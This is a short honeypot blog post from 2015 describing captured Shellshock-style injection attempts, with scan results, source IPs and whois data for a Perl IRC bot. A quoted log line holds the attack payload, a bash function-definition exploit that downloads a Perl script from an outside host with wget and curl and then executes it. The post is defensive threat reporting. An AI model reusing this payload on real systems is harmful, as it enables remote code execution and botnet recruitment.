Sonntag, 14. Juni 2015

Perl script injection: 85.214.60.234/den

The last two days several Shell injections have hit my Honeypot. Any of them tried to download a prscript and execute it

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection
I have downloaded the file manually, it is a perl IRCbot.

 /XFupload.py -f den
{"malware":{"type":"md5","md5":"0x7AE21F4543FE5F842A7BB9F79D95A88E","origins":{"external":{"detectionCoverage":35,"family":["trojan"]}}}}
and
clamscan den
den: Trojan.IRCBot-1142 FOUND
The sources of the attrack are
  •  223.252.35.159 (AU)
  • 74.208.167.71 (US)
Both hosts seem to be hosted servers (1and1 and Ozservers)

The perl script seems to be written by "Jericho Security Team Perl Bot v3.0"
Strange as it is, the server address within the script is set to
place.youredomainhere.net

Or even more strange that this domain is hosted by schlund

inetnum:        87.106.0.0 - 87.106.15.255
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE